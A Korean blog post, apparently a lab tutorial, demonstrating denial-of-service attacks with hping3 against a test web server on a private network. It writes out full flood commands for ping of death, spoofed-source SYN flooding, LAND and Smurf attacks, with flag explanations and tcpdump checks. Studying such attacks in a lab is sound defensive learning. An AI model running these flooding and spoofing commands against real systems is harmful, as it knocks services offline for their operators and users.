Dos(Denial of Service) 공격은 대상 컴퓨터에게 비정상적인 패킷을 전송함으로써 공격 대상이 서비스 불능 상태에 빠지도록 하는 공격이다.
이 포스트에서는 hping3 프로그램을 이용하여 ping of death, syn flooding 공격을 실습한다.
실습 환경 구성은 다음과 같다.
네트워크 환경 : NAT
공격자
IP : 192.168.11.19
공격 대상 (웹 서버)
IP : 192.168.11.23
실습 진행 전에 hping3을 설치한다.
# yum install -y hping3
Ping Of Death
# hping3 --icmp --rand-source 192.168.11.23 -d 65000 --flood=> 192.168.11.23 호스트로 송신지 IP를 랜덤으로 하여 65000byte 크기의 icmp 패킷을 최대 속도로 전송.
--icmp
- icmp 패킷 전송
--rand-source
- source IP를 랜덤으로 하여 패킷 생성
-d
- 패킷 크기 (최대 65535, byte 단위)
--flood
- cpu가 가능한 최대 속도로 패킷을 전송.
--fast : 초당 10개
--faster : 초당 100개
-a [IP주소]
- 패킷의 source IP를 지정
- 일종의 스푸핑이 되는 셈.
공격 대상에서 들어오는 패킷을 캡처해보면 icmp 패킷이 잔뜩 들어오는 것을 확인할 수 있다.
# tcpdump -i ens32 icmp
SYN Flooding
SYN Flooding은 TCP/IP 통신에서 서버가 클라이언트의 SYN 패킷을 수신하면 초기 설정을 위해 각종 정보를 메모리에 로드한다는 점을 악용한 공격이다.
공격자가 서버의 활성화된 포트를 대상으로 SYN 패킷을 대량으로 전송하면,
서버는 각각의 요청에 대한 초기화 정보를 메모리에 구성하다가 메모리가 가득 차 더이상 서비스를 할 수 없게 된다.
공격자 측에서 hping을 이용해 SYN Flooding을 진행한다.
# hping3 --rand-source 192.168.11.23 -p 80 -S --flood
-p : 대상 포트
-S : SYN 패킷 전송
공격 대상 측에서 패킷을 캡처해보면 80번 포트로 패킷이 잔뜩 들어온다.
# tcpdump -i ens32 tcp port 80 and host 192.168.11.23
다만, 컴퓨터 성능이 좋아서 그런지 실제로 서비스가 다운되는 것 까지는 확인하지 못했다.
(VMware 기준 공격자 PC의 메모리가 1G다..)
포트 번호를 22번으로 설정했더니 puty 접속은 되지 않았다. 공격에 성공한 듯 하다.
# tcpdump -i ens32 tcp port 22 and host 192.168.11.23
LAND 공격
LAND 공격은 패킷의 송수신지 주소를 같게 설정하여 공격 대상이 해당 패킷에 대해 자기 자신에게 응답하도록 하는 공격이다.
하나의 패킷에 대해 공격 대상이 응답을 두번 하므로 좀 더 쉽게 공격 대상 시스템을 무력화할 수 있다.
다만, 현재 대부분의 OS는 이러한 패킷을 자동으로 버리므로 별 소용은 없다.
# hping3 192.168.11.23 -a 192.168.11.23 --icmp --flood
Smurf 공격
공격 대상을 목적지로 지정해 브로드캐스트 패킷을 날리는 공격 기법이다.
해당 네트워크에 속한 모든 호스트가 동시에 공격 대상에게 응답을 보내도록 함으로써 공격 대상 시스템을 마비시키는 공격이다.
이 역시 현재 대부분의 OS가 반응하지 않아 별 소용은 없다.
다만, 스위치, 라우터 등의 OS 업데이트가 느린 장비는 간혹 응답한다고도 한다.
# hping3 192.168.10.255 -a 192.168.11.23 --icmp --flood
'Network > 공격 기법' 카테고리의 다른 글
| DDoS (Destribute Denial of Service) 공격 - Trinoo (0) | 2023.05.15 |
|---|---|
| ARP 스푸핑 대처법 (0) | 2023.05.12 |
| DNS 스푸핑 (0) | 2023.05.11 |
| ARP 스푸핑 (0) | 2023.05.11 |
| ICMP 리다이렉트 (0) | 2023.05.10 |
